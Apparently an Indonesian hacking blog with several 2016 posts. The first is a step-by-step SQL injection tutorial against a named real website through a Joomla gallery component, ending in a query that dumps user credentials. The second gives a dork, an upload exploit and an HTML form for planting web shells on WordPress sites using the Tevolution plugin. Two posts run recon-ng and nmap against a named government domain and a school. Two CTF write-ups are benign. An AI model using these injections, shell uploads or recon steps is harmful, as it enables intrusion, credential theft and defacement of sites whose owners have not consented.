Rabu, 11 Mei 2016

Joomla Easy Youtube Gallery 1.0.2 SQL Injection Vulnerability

Stay Cool and Keep ./Crotz gaes, kali ini gue 3xBitCh bakal Share Tutorial Deface Joomla Easy Youtube Gallery 1.0.2 SQL Injection Vulnerability
yoii kali ini kita maen suntik2an di CMS Joomblo.

Oke langsung Aja gay gak usah banyak coli cocote

Dork :
inurl:com_easy_youtube_gallery mycategory
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)

1. Kita Search Dork nya menggunakan search engine


2. Oke kita Pilih Target Yang mau kita injek, disini letak injeknya ada di mycategory= ,
kita coba input string ,jika seperti ini tandanya VULN 


3. Sekarang kita coba cari errornya dimana. 
Kita coba injek satu satu:
http://centreexcursionistabocairent.com/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+order+by+1--+&defaultvideo=3&Itemid=120 // masih normal

http://centreexcursionistabocairent.com/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+order+by+2--+&defaultvideo=3&Itemid=120  // masih normal lagee

http://centreexcursionistabocairent.com/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+order+by+3--+&defaultvideo=3&Itemid=120 // masih normal mpe lemez mz

http://centreexcursionistabocairent.com/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+order+by+15--+&defaultvideo=3&Itemid=120 // error gan :v *jozz ahhh~

Kolomnya cuman sampe 14 gannn
4. Oke lanjut ke step berikutnya, kita cari angka ajaibnya :D

http://centreexcursionistabocairent.com/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=-0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--+&defaultvideo=3&Itemid=120

Nah, angka ajaibnya Keliatan Gay :v
5. Oke biar gampang, saya pake DIOS nya mas madblood /-\ 

Nah keliatankan Isi daleman web nya ?:v
6. Sekarang kita liat lebih dalem lagi gimana? :v 


Tuh DALEMANNYA keliatan gann :v
Terus abis itu diapain , kalo dh keliatan dalemannya ? , buka tusuk -> crotz di dalem..

Ini querynya :
http://centreexcursionistabocairent.com/index.php
?option=com_easy_youtube_gallery
&view=videos
&mycategory=-0+union+select+1,2,3,4,5,6,group_concat(username,0x3a,password),8,9,10,11,12,13,14+from+ceb_users--+
&defaultvideo=3
&Itemid=120



Karna ini cms Joomla letak page adminnya ada di target.coli/administrator/
Baca juga, tutorial cara menanam Shell di CMS Joomla: Cara Deface Com_User Auto Exploiter dan Cara menanam shell di CMS Joomla

Btw yuk up2date tentang TKJ Cyber Art, di Official Account Line Kami: http://line.me/ti/p/%40hjl8740i
*bebas utk bertanya *sharing bareng *kepo2deh akwkwa #joinUs

Selamat berinjek dan berhash2 ria akwkawk
Oke Sekian tutorial dari saya, Semoga bermanfaat bagi kalean.

source and thanks to: 0day


Call Me Sayang A.K.A 3xBitch


tidak perlu muncul ke permukaan , yang penting tetap bergerilya












Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

Senin, 09 Mei 2016

Tutorial Deface WordPress Plugins Tevolution dengan Mass Xploiter

Hello World ; Malam Fans, Please Say Hello Haters :*
xixixhi, Nuenomaru disini, Sekarang Nue akan Share Tutorial Deface WordPress Plugins Tevolution dengan Mass Xploiter tool buatan IndoXploit *exploitnya lagi booming nih dikalangan dispenser :3 *yang dah expert minggir dlu beb ;*
Exploit ini adalah salah satu bug/celah yg terdapat pada plugins CMS WordPress.


Langsung Intip tutorialnya ;*
Dork:
inurl:"/wp-content/plugins/Tevolution/"
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)


1. Dorking di search Engine

2. pilih salah satu web target yg pengen ente tusb0l pak wkwk, lalu masukan exploitnya.


exploit: /[path]/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php

3. Vulnerability ~ Blank


kurang lebih sih gitu~ akwkwa :v

Kumpulin dulu semua target yang vuln, kalo dah banyak waktunya proses auto tanem shell menggunakan Mass Xploiter buatan tim IndoXploit..
disini gua dh tanem toolnya di web org.
Klik disitu -> Dont touch Me Senpai :')



Shell name: nuenomaru bisa di ganti dgn sesukalu.php.xxxjpg
*pada exploit ini kita manfaatkan bypass ekstensi shell..

pada kolom Target, pastekan target2 yg pgn ente tusb0l.
Lalu Klik Hajar! , makan akan secara otomatis akan muncul letak shell ente..
lalu klik deh :




file/shell akses: /wp-content/uploads/thn/bln/namashell.php.xxxjpg

disini script Mass Auto xploiter Plugins Tevolution -> http://pastebin.com/9SCkGP3h

cara pake? :
- masukin ke hosting/shell backdoor
- buka filenyaaa
- happy deface ^_^

CSRF:

<form
action="target.coli/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="3xploi7ed !">
</form>



Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy WordPress Hacked !!
Sekian dan semoga bermanfaat .. terimakasih



source and Big thanks to: blog indoXploit




./Nuenomaru





tidak perlu muncul ke permukaan , yang penting tetap bergerilya












Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

Jumat, 06 Mei 2016

Pembahasan Soal Cyber Jawara 2015 - Camouflage.mp4 ( Easy )

Hello World; , Malam Fans ,  Please say hello haters ;)
Nuenomaru disini .-. , xixixhi akhirnya ane nulis artikel lagi gengs awkkwa.
Sekarang Gua pen ngebahas Soal Cyber Jawara 2015 - Camouflage.mp4 ( Easy )

Soal bisa di download disini:
Google Drive

Capture the Flag - Cyber Jawara 2015
file name: Camouflage.mp4
Level: Easy

Lanjut intip tutorial nya ;*
Saat Soal tersebut kita download dan Kite Buka, yang terlihat Hanya Slide Cewek cewek Seksi.

Saat pertama download , saya masih menggunakan OS Linux. Saya coba beberapa cara termasuk menggunakan exiftool namun tidak ada hasil.

Merasa kehabisan akal, iseng saya ketik di google dengan keyword "camouflage tools"
Dan ketemu website yang menyediakan tools nya: http://camouflage.unfiction.com/
hmm ini merupakan aplikasi .exe , langsung gua reboot ke OS Jendela. aplikasi ini saya install di C:\Program Files (x86)\Camouflage

Masukkan file Camouflage.mp4 ke folder Camouflage.




Awalnya gua setting file mp4 nya "open with" camouflage.exe . Ternyata tidak bisa. Harus menggunakan command.
Lalu gua buka CMD:

cd C:\Program Files (x86)\Camouflage
Camouflage.exe -u Camouflage.mp4


Disuruh memasukkan password. Namun karena tidak ada clue password, kita coba next saya. Ternyata berhasil.


Pilih fl4g.txt lalu klik / buka fl4g.txt nya



Isi dari fl4g.txt nya adalah
you have to md5 this word for the submit flag


{DZIKRI_GANTENG}



Kita cari md5 generator. Banyak kok tools online.
Lalu Masukkan kata yang akan di hash " DZIKRI_GANTENG " .

Congrats .. Flag pun ketemu.. 

Flag nya adalah :
CJ2015{ce8739056a48fac539891c11ed8ca33e}

sekian write up sederhana dari saya, mohon maaf kalau ada salah pemberian definisi dan maaf juga kalau penjelesannya banyak yang missed.. 
Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy Pentesting | Capture the Flag
Sekian dan semoga bermanfaat .. terimakasih


source and thanks to: LinuxSec


./Nuenomaru



apt-get you come to MyLife











Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

Rabu, 04 Mei 2016

Pembahasan Soal Cyber Jawara 2015 - 132486.tar.gz ( Easy )

Hello World; , Malam Fans ,  Please say hello haters ;)
Nuenomaru disini .-. , xixixhi akhirnya ane nulis artikel lagi gengs awkkwa.

setelah 2 thread sebelum ini, si om oepil menjelaskan tentang  topik metode Information Gathering on Linux (btw nice Umz xixixhi).
tapi sekarang gua Nuenomaru pen ngebahas Soal Cyber Jawara 2015 - 132486.tar.gz ( Easy )

Soal bisa di download disini:
Google Drive TKJ
Solid Files

Detail soal:
Capture the Flag - Cyber Jawara 2015
file name: 132486.tar.gz 
Level: Easy

Lanjut intip tutor ;*
Setelah didownload, karena itu file archive saya coba ekstrak. Ternyata error.



Iseng saya gunakan exiftool.

Ternyata memang format file nya error.


Lalu saya masukkan command :

cat 132486.tar.gz > flag.txt


Lalu gua buka file flag.txt yang tadi di buat di terminal


Please Let Me Know What is This

IyMjc29fc2ltcGxlX2ZsYWdfZm9yX3lvdSMjIw==


13+13+64

dan gua tertarik dengan 
IyMjc29fc2ltcGxlX2ZsYWdfZm9yX3lvdSMjIw==

gua coba decode dgn base64

Congrats .. Flag pun ketemu.. 

Flag :

CJ2015{###so_simple_flag_for_you###}


sekian write up sederhana dari saya, mohon maaf kalau ada salah pemberian definisi dan maaf juga kalau penjelesannya banyak yang missed.. 
Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")


Salam para penjinak pinguin :v , Penunggang Naga,  Viva Real Tux Warrior Gaes :'v wkkwkwkw

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy Pentesting | Capture the Flag
Sekian dan semoga bermanfaat .. terimakasih







./Nuenomaru



Waktunya Jemput MasaDepan, Bukan Nungguin MasaDepan







Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

Selasa, 03 Mei 2016

Information Gathering With Recon-ng On Backbox

RECON-NG

Hallo semua , kembali lagi bersama gua #OepilCore , kwkwkw oke gua kali ini bakalan tetep ngeshare hal yang sama seperti kemarin , yaitu INFORMATION GATHERING ,
setelah kemarin gua share tentang information gathering melalui NMAP ,
tapi kali ini gua share tentang information gathering menggunakan Recon-ng di backbox 
bagi kalian yang belum install recon-ng di backbox , silahkan kalian menuju ke link ini
= Recon-ng

oke langsung kita praktek ajah , biar gak panjang lebar karena mata gua udah 5 watt kwkwkw
cekidott~

Lanjut tutorial
untuk kalian yang belum tau apa itu recon-ng , bisa coba surf di mbah google kwkwkw karena ane gak mungkin memberikan tanggapan yang ane tau tentang tool ini , yang pasti ini salah satu tool untuk auditing yang emang bener bener joss kalo menurut gw , *sok tau , baru make sekali ajah nih gw kwkwkwkw*

oke langsung ke prakteknya ya ,

setelah kalian install recon-ng , kalian bisa menggunakannya dengan command

./recon-ng
lalu akan muncul tampilan seperti berikut ,



nahh kalo udah begini , kalian bisa melihat modul apa ajah yang terdapat didalam recon-ng ini ,
dengan cara mengetikan command sebagai berikut 

show modules

dan akan menghasilkan layar sebagai berikut ,



oke disini saya menggunakan modul seperti ini
recon/domains-hosts/bing_domain_web
modul tersebut digunakan untuk mengecek website target terhubung dengan subdomain apa saja ,
seperti berikut ini ,

untuk menggunakannya kalian hanya harus meload modul tersebut dengan command berikut

[recon-ng][default] > load recon/domains-hosts/bing_domain_web
[recon-ng][default][bing_domain_web] > set source pu.go.id
SOURCE => pu.go.id
[recon-ng][default][bing_domain_web] > run






maka akan menghasilkan banyak web yang bersangkutan dengan si target seperti berikut ,



untuk melihat lebih jelasnya kalian bisa menggunakan query select ,
dengan command seperti berikut

query select * from hosts





banyak bukan subdomainnya ?
oke selanjutnya kita akan melihat ada berapa email dan siapa saja yang terdapat dalam website target yang sedang kita uwik ini informasinya kwkwkw~

dengan seperti berikut ini

[recon-ng][default][bing_domain_web] > back
[recon-ng][default] > load recon/domains-contacts/pgp_search
[recon-ng][default][pgp_search] > set source pu.go.id
SOURCE => pu.go.id
[recon-ng][default][pgp_search] > run

dan akan menghasilkan beberapa email yang keluar seperti berikut



oke sudah dapat kan emailnya ? kwkwkw
kalo masih kurang informasi yang kita dapat , tinggal gunakan lagi modul yang lain , silahkan kalian sekreatif mungkin deh menggunakan modul modul tersebut , seperti yang satu ini

jikalau kalian ingin mengetahui letak geolocation dari si target ini kalian bisa menggunakan command sebagai berikut ,

[recon-ng][default][pgp_search] > back
[recon-ng][default] > load recon/locations-locations/geocode
[recon-ng][default][geocode] > set source pu.go.id
SOURCE => pu.go.id
[recon-ng][default][geocode] > run

dan akan mengeluarkan hasil sebagai berikut ,



gimana oke gak ? kwkwkwk XD
banyak yang bisa kalian uwik dari sebuah target website menggunakan tool ini ,
untuk selebihnya silahkan kalian praktekan sendiri mueheeheh :3

oke sekian dulu dari saya #OepilCore , maaf bila ada kesalahan kata dan salah dalam pengertian ,
terimakasih buat perhatiannya dan udah mau baca artikel kita ini kwkwkwk ,

sampai bertemu di postingan gua berikutnya oke ,
gua #OepilCore , and keep your head on !!
paypaayy~



Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

Senin, 02 Mei 2016

Information Gathering With NMAP On Backbox




Hallo semua , kembali lagi bersama gua #OepilCore ..
oke udah lama kita tidak berjumpa , *apa emang guanya ajah yang jarang nongol kwkwkww*
maafkan aku om Nuenomaru yang jarang posting , jangan apa apakan aku :3 kwkwkwkw~

oke , kali ini gua bakalan share tentang Information Gathering With NMAP On Backbox , yang sebelumnya gua pernah posting tentang NMAP tapi di Os Jendela
dan diatas adalah interface backbox gua :3, gimana kece enggak ? kwkwkwk , oke langsung to the point ajah , cekidott~





jadi , Nmap adalah sebuah tool open source yang digunakan untuk memeriksa jaringan publik seperti webserver ataupun jaringan lokal. Nmap dapat mencari informasi tentang IP, Port, Service yang ada pada sistem operasi web server.


oke langsung ke prakteknya ajah ,

untuk melihat command nmapnya , kalian bisa mengetikan

"nmap --help"

disini gua menggunakan target website sebuah sekolah IT di sekitaran Jakarta timur ,

kalian bisa mengetikan command berikut ,

" nmap smkprestasiprima.sch.id -sS -O -sV "

Keterangan tentang perintah yang dipakai diatas :
• sS : Melakukan scanning secara silent atau diam-diam

• sV : Melakukan scanning terhadap software yang membuka port 80 (HTTP)




dan akan mengeluarkan hasil sebagai berikut ,



Nmap scan report for smkprestasiprima.sch.id (148.163.97.139)
Host is up (0.23s latency).

rDNS record for 148.163.97.139: we.love.servers.at.ioflood.com
Not shown: 989 filtered ports

PORT    STATE SERVICE    VERSION
21/tcp  open  ftp        Pure-FTPd
22/tcp  open  ssh        OpenSSH 5.3 (protocol 2.0)
53/tcp  open  domain
80/tcp  open  http       Apache httpd 2.4.16 ((Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4)
110/tcp open  pop3       Dovecot pop3d
143/tcp open  imap       Dovecot imapd
443/tcp open  ssl/http   Apache httpd 2.4.16 ((Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4)
465/tcp open  ssl/smtps?
587/tcp open  smtp       Exim smtpd 4.87
993/tcp open  ssl/imap   Dovecot imapd
995/tcp open  ssl/pop3s?

dari hasil diatas dapat disimpulkan , bahwa ada port yang terbuka , dan service apa yang tersedia serta versi berapa ,

80/tcp  open  http       Apache httpd 2.4.16 ((Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4)

oke , gua rasa hanya segitu yang dapat gua bagikan hari ini ,

maaf bila ada kesalahan kata dan salah dalam pengertian ,
terimakasih atas ebook dari Backbox Linux - Web Pentesting  dan juga www.newbie-security.or.id
selamat mencoba , dan terus belajar :3 ..
oke , sampai berjumpai di postingan gua berikutnya kwkwkw~

#Oepilcore disini and keep your head on
~paypay ,












Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
 

ande ande lumoet Template by Ipietoon Cute Blog Design